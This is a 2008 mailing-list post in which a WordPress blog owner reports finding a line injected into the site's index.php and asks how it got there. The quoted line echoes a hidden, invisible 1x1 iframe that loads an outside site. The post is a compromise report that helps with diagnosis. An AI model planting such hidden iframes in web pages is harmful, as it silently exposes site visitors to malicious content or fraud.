[wp-hackers] XSS vuln in wordpress 2.7 ?
madalin
niladam at gmail.com
Mon Dec 22 17:27:21 GMT 2008
Hello,
For some reason i found my blog's index.php (not theme's index.php)
with the following piece of code right before the ?>
echo "<iframe src=\"http://thedeadpit.com/?click=17470781\" width=1
height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
I tried looking at the logs. No luck. The file's permisions look like this:
-rw-r--r-- 1 madalin madalin 557 Dec 22 15:50 /home/madalin/www/index.php
I'm still trying to figure out how that line got there. I've
downloaded wordpress right from wordpress.org, and the server is a
dedicated one, only two users with shell access to it.
Any suggestions ?
--
Regards,
madalin
http://madalin.eu
http://www.tg-jiu.ro
http://www.radioomega.ro
More information about the wp-hackers
mailing list